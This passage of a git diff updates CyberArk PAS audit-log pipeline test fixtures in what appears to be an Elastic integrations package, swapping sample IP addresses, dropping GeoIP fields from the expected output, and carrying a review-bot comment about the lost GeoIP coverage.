-<5>1 2021-03-10T09:11:36Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:36","IsoTimestamp":"2021-03-10T09:11:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PVWAGWAccounts","TargetUser":"","Safe":"PSMPADBUserProfile","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:37Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:37","IsoTimestamp":"2021-03-10T09:11:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMP_ADB_localhost.localdomain","TargetUser":"","Safe":"PSMPADBridgeConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:38Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:38","IsoTimestamp":"2021-03-10T09:11:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"","Safe":"PSMPADBridgeCustom","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T17:59:32Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:32","IsoTimestamp":"2021-03-10T17:59:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Master","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Administrator","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Batch","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Operators","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Backup Users","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Auditors","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"DR Users","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Notification Engines","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMPApp_localhost.localdomain","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"PSMPLiveSessions","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Vault Admins","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSMPLiveSessions","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:36Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:36","IsoTimestamp":"2021-03-10T09:11:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PVWAGWAccounts","TargetUser":"","Safe":"PSMPADBUserProfile","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:37Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:37","IsoTimestamp":"2021-03-10T09:11:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMP_ADB_localhost.localdomain","TargetUser":"","Safe":"PSMPADBridgeConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:38Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:38","IsoTimestamp":"2021-03-10T09:11:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"","Safe":"PSMPADBridgeCustom","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T17:59:32Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:32","IsoTimestamp":"2021-03-10T17:59:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-32-add-owner.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-32-add-owner.log-expected.json
index 0c06f3da561..ff8d5d395f0 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-32-add-owner.log-expected.json
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-32-add-owner.log-expected.json
@@ -7,20 +7,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" 
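Review bot: The regenerated expected output drops `source.geo` entirely for 67.43.156.13 instead of carrying an updated geo object, so after this change the test-32-add-owner fixture no longer exercises the pipeline's GeoIP enrichment at all; the same removal repeats in the hunks at @@ -92, -176, -261, -346, -431 and -516 of this file. If the GeoIP database used by the pipeline tests has a record for 67.43.156.13, the missing `geo` block points at the environment the file was regenerated in rather than at the pipeline, and the file should be regenerated; if it does not, it is worth keeping at least one fixture on an address that does resolve so a broken geoip processor is still caught by the test. The `event.ingested` values also churn with every regeneration (the 2021-06 to 2021-12 rewrites in the @@ -64 hunk and its siblings) without any pipeline change behind them, which makes real output differences harder to spot in these diffs; if the pipeline test configuration for this data stream can mark a field as dynamic, excluding `event.ingested` from the comparison would keep future fixture diffs limited to genuine pipeline changes.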
@@ -41,7 +29,7 @@ "Master" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -50,7 +38,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:20Z", "safe": "PSMPConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "Master", "message": "Add Owner", @@ -64,8 +52,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021023200Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Master\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101419Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Master\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", 
@@ -92,20 +80,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -125,7 +101,7 @@ "Administrator" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -134,7 +110,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:20Z", "safe": "PSMPConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "Administrator", "message": "Add Owner", 
@@ -148,8 +124,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021035500Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Administrator\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101427Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Administrator\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", 
@@ -176,20 +152,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -210,7 +174,7 @@ "Batch" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -219,7 +183,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:20Z", "safe": "PSMPConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "Batch", "message": "Add Owner", 
@@ -233,8 +197,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021038900Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Batch\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101432600Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Batch\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", 
@@ -261,20 +225,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -295,7 +247,7 @@ "Operators" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -304,7 +256,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:20Z", "safe": "PSMPConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "Operators", "message": "Add Owner", 
@@ -318,8 +270,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021041600Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Operators\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101437900Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Operators\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", 
@@ -346,20 +298,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -380,7 +320,7 @@ "Backup Users" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -389,7 +329,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:20Z", "safe": "PSMPConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "Backup Users", "message": "Add Owner", 
@@ -403,8 +343,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021044200Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Backup Users\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101443300Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Backup Users\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", 
@@ -431,20 +371,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -465,7 +393,7 @@ "Auditors" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -474,7 +402,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:20Z", "safe": "PSMPConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "Auditors", "message": "Add Owner", 
@@ -488,8 +416,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021046400Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Auditors\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101448700Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add 